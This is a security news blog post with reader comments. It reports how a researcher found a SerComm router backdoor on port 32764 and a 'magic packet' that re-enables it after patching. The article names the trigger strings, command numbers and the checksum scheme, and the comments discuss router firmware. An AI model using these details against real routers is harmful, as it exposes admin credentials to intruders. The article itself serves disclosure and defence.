The SoHo router backdoor that was "fixed" by hiding it behind another backdoor

Filed Under: Featured, Security threats, Vulnerability

Over the Christmas break at the end of 2013, French hacker Eloi Vanderbeken decided to see if he could break into his own Netgear router.

He wanted to tweak some of the performance settings, but realised he'd forgotten the password, and hacking his way in seemed more fun that doing a hardware reset and starting from scratch.

Long story short, Vanderbeken found his way in.

Turns out there was a service listening on port 32764 (mercifully only on the internal interface by default, not on the internet side!) that could be instructed, without authentication, to dump the router's configution.

Including the admin username and password.

All he had to do was to send the text ScMM (short for SerComm, the original equipment manufacturer), followed by a command number (1 to dump the configuration), followed by the number zero (meaning "I have no further data to send").

Even if a backdoor like this is only accessible to users who are already on your network, it's still a giant security hole.

It means, for example, that any duplicitous guests to whom you grant internet access can surreptitiously get into your router and mess with the settings, including opening up the backdoor on the internet interface so they can get back in later.

The vendor therefore came out with a patch, closing the listening port and with it the backdoor.

That got Mr Vanderbreken thinking, "How serious was the patch?"

After all, if the original purpose of the backdoor was to make it easier for the vendor's own management software to interact with the router, a patch that closed the backdoor altogether would necessitate wholesale changes to the management software, too.

Another long story short, Vanderbeken found that the backdoor was still there [PDF], just turned off by default.

He discovered that you could re-renable it by sending the router a so-called "magic ethernet packet."

→ If you've ever used a feature called Wake-on-LAN, you've used a "magic packet": it's an ethernet frame that acts as a signal, rather than carrying data, telling a network card to power up the computer in which it's installed. Wake-on-LAN can be very handy. You can leave your computers turned off at night to save power, and rely on the network card alone to let you activate the computer remotely if required, for example to install security updates.

Greatly simplified, Ethernet frames start with the six-byte MAC address (network card ID) of the destination device; the MAC address of the source device; and a two-byte type EtherType identifier.

Example EtherTypes are 0800 for an IPv4 packet, 86DD for an IPv6 packet, 0806 for ARP (address resolution protocol), and 0842 for Wake-on-LAN.

Sercomm routers, or at least Vanderbeken's Sercomm router, also look out for 8888 "magic packets", which act as another backdoor.

Vanderbeken found that if he sent his router an 8888-type packet containing the number 0x0201 (effectively a command identifier) and the MD5 checksum of the string DGN1000, corresponding to his router's model number, then...

...the original backdoor listening on port 32764 was reactivated!

Just in case you don't know if there are any vulnerable routers on the current LAN segment, Vanderbeken also found that sending a broadcast 8888 packet with command number 0x0200 would provoke the router to reply, allowing a would-be attacker on a LAN to find out automatically if there are any exploitable routers in range.

What to do?

Short of decompiling your router's firmware, like Vanderbeken did, it's hard to tell whether your vendor has left behind a security hole of this sort.

Even if you think your router has this very same "magic packet" hole, you can never be sure exactly what model identifier string is used in the firmware to generate the MD5 checksum used to validate the magic packets.

So we'll simply repeat the advice we gave last time.

If you're technically inclined, or have a friend or family member who is and can help you, you might want to see if your router can run an open source firmware such as OpenWRT or DD-WRT.

Those are Linux-based firmware builds for low-end routers that are much more modular than most of the firmware downloads from router vendors, meaning that you can leave out the bits you don't need.

They also receive regular security patches, thanks to the care and attention of the developer communities that have sprung up around them.

And if you are ready to go a bit more high-end than a SoHo router, you might want to grab a copy of Sophos's award-winning UTM product, which you can run entirely for free at home.

Click to go to download page...

Image of open doors courtesy of Shutterstock.

, , , , ,

You might like

6 Responses to The SoHo router backdoor that was "fixed" by hiding it behind another backdoor

  1. shane · 183 days ago

    nice article.... However the dd-wrt site has been up and down like a yo yo.
    Don't get me wrong. I have been donating to that crazy hair guy for years...

    • Paul Ducklin · 182 days ago

      Site has always worked for me (though I am more of an an OpenWRT man myself).

      As for "crazy hair," wouldn't "hair that's a bit 1980s" be a fairer way to put it? Not sure what he looks like today, but we can let other readers decide. Here is the chap to whom you allude (Sebastian Gottschall of DD-WRT), a few years ago:

      http://www.tomsnetworking.de/aktuelles/news_beitrag/news/4005/index.html

      • Steve-o · 182 days ago

        Thanks to Paul's link, I can second Shane's opinion. That is Crazy Hair! And, in my own opinion, I kind of like it.

  2. David Attard · 183 days ago

    And what guarantees that OpenWRT doesn't have a Heartbleed type of bug?

    It's obviously a rhetorical question - point being, I don't think we can ever eliminate all the risks associated whatever version of software we use ...

    • Guy · 183 days ago

      Surely it would be good practice to just boycott ANY hardware vendor that would consider putting backdoors into its products?

      What gets me is not whether it was technically patched, but the willingness of the vendor to deliberately create a way to violate my privacy.

      • Paul Ducklin · 182 days ago

        Wonder if they even thought of it as a "backdoor"? Did the product vendor even know it was there, or did it just "come free with the firmware"?

        Many people are dreadfully concerned about backdoors that may or may not be in products "because the NSA made the vendor do it." In a way, that actually unsettles me a lot less than this sort of thing. At least in the case of an NSA backdoor (real or imagined), there would be some purpose, some intention, some planning, heck, even if it were kept super-secret, there'd be *some* documentation somewhere.

        But there is a sort of parallel universe of backdoors and security holes that exist entirely because of a "who cares...she'll be right" attitude.

        In other words, if deliberate willingness to violate your privacy is a bad thing (and it is), how much worse is violating your privacy entirely on account of what you might call a "giant unconcerned shrug"?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Paul Ducklin is a passionate security proselytiser. (That's like an evangelist, but more so!) He lives and breathes computer security, and would be happy for you to do so, too. Paul won the inaugural AusCERT Director's Award for Individual Excellence in Computer Security in 2009. Follow him on Twitter: @duckblog